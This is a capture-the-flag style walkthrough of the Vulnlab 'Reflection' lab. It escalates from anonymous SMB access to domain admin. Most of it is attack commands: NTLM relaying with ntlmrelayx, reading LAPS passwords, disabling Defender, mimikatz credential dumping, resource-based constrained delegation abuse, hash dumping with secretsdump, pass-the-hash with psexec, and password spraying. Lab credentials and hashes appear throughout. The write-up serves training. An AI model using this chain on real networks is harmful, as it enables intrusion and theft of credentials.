11 KiB
Vulnlab - Reflection
NMAP
DC01.reflection.vl
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-13 18:24:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-08-13T18:26:16+00:00; -1s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62571/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
MS01.reflection.vl
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: 2023-08-13T16:57:16+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ms01.reflection.vl
5985/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
WS01.reflection.vl
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=ws01.reflection.vl
PORT 445 (SMB)
Enumerating the smb shares from the machines, we only get list of shares with null authentication on MS01
Accessing `staging` share we'll get `staging_db.conf` file having credentials
With `crackmapexec` we can try to authenticate on smb to verify if these are valid credentials
cme smb hosts.txt -u 'web_staging' -p 'Washroom510'
We can try authenticating over MSSQL as that service is running on DC01 and MS01
cme mssql hosts.txt -u 'web_staging' -p 'Washroom510' --local-auth
We get a vaild login so we can proceed with using mssqlclient.py from impacket
mssqlclient.py web_staging:'Washroom510'@10.10.173.134
Since xp_cmdshell was not allowed for this user
We can try using xp_dirtree to coerce the server to our machine in order to retrieve NTLMv2 hash of service account of mssql
But cracking this hash didn't worked as well
So we can't crack this hash, maybe we can relay as smb signing is disabled
With ntlmrelayx.py we can realy the hash and authenticate
It shows that relaying on smb worked, we can also try to relay it on mssql running on DC01 which will allow us to execute queries as svc_web_staging
ntlmrelayx.py -t mssql://10.10.173.133 -smb2support --query 'SELECT @@version'
We can enumerate the databases, as here's there's one called prod
ntlmrelayx.py -t mssql://10.10.132.133 -smb2support --query 'SELECT name FROM master.dbo.sysdatabases;'
But listing the tables in that database didn't worked as this user doesn't have access , trying to enable xp_cmdshell didn't worked here as well
So there was nothing we could do from here but as saw previously that svc_web_staging was able to authenticate smb we can list shares and try to access shares from DC01, for this we need to use socks proxy as it's going to keep the smb connection open and also lists the relays which were successful
ntlmrelayx.py -tf hosts.txt -smb2support -socks
It does show that this user is not an admin but still we can access the smb shares as a domain user with smbclient
To my surprise this didn't worked and I don't know the reason, maybe it's an issue with my version of smbclient but with smbclient.py from impacket worked like a charm
proxychains smbclient.py reflection/svc_web_staging@10.10.132.133
From prod share we can grab prod_db.conf
'
Having the credentials for the production, we can enumerate the database
mssqlclient.py web_prod:Tribesman201@10.10.132.133
From the users table we'll get set of two credentials
On verifying these credentials, both of them are domain users
So now we can enumerate the domain with `bloodhound` , before doing that make sure to edit the hosts file for dc01.reflection.vl entry
python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'reflection.vl' -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' -ns 10.10.132.133 -c all
From bloodhound we see these two users are part of Staff group
But Staff group didn't had any ACLs, abbie had `GenericAll` on `MS01`
Unfortunately we can't just add a computer object as there's 0 machine quota
However, since we have GenericAll, we can read LAPS on MS01 which is a randomized password for local administrator
cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps
evil-winrm -i 10.10.132.134 -u 'administrator' -p 'H447.++h6g5}xi'
Disabling the defender with Set-MpPreference -DisableRealtimeMonitoring $true
Uploading netcat and getting a shell again as evil-winrm was causing an issue with mimikatz
From the cache, we see Georgia.Price
With vault::cred /patch we can list the credentials from the credential vault
Going back to bloodhound, this user also has GenericAll on WS01
We know that there's no machine quota available but we do have access to MS01, we can add that machine in WS01's msDS-AllowedToActOnBehalfOfOtherIdentity property, for this we need to get the NThash of MS01
Editing the `msDS-AllowedToActOnBehalfOfOtherIdentity` with `rbcd.py` from impacket
rbcd.py -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.188.197 "Reflection/Georgia.Price:DBl+5MPkpJg5id"
After adding the property, we can impersonate the administrator ticket on WS01 with getST.py
getST.py -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.188.197 'Reflection/MS01$' -hashes ':6e77d4ac157a47c5581681b8f865677e'
And now we can dump hashes from WS01
secretsdump.py administrator@WS01.reflection.vl -k -no-pass
Since defender was enable on WS01 we couldn't get a shell through psexec.py
We can however use atexec.py to schedule the commands to be executed in order disable defender
atexec.py ws01/administrator@10.10.188.199 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'
After this, we'll be able to use psexec to get a shell
psexec.py administrator@WS01.reflection.vl -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'
As we already dumped hashes, we have Rhys.Garner's password who is a local admin on WS01, this user didn't had any ACLs on any object, checking the domain admins, there are 2 domain admins
We can try spraying the password on them to see if we can get access to those users
Which worked on DOM_RGARNER, with this we can login on DC01 through winrm and become domain admin
